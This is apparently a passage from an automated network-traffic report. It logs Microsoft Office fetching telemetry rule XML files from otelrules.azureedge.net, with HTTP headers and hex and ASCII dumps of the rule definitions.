                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                                                                                                                                              Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              5192.168.2.64972313.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:16 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:16 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 19bd46a7-901e-0048-5f4e-41b800000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062216Z-174f7845968l4kp6hC1EWRe8840000000y90000000008aqb
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              6192.168.2.64972513.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:16 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:16 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062216Z-174f7845968psccphC1EWRuz9s0000000y6g00000000e944
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              7192.168.2.64972713.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:16 UTC192OUTGET /rules/rule120100v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:16 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 1000
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB097AFC9"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 6584919e-f01e-0003-06a3-3f4453000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062216Z-174f7845968vqt9xhC1EWRgten0000000y40000000004ssb
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC1000INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              8192.168.2.64972613.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:16 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:17 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062217Z-174f7845968l4kp6hC1EWRe8840000000yd0000000000bvu
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              9192.168.2.64972413.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:16 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:17 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062217Z-174f78459684bddphC1EWRbht40000000xp000000000hsv7
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:17 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              10192.168.2.64973613.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:19 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062219Z-174f7845968cdxdrhC1EWRg0en0000000xy000000000c0d5
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              11192.168.2.64973513.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:19 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062219Z-174f78459685m244hC1EWRgp2c0000000xzg000000000xcx
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
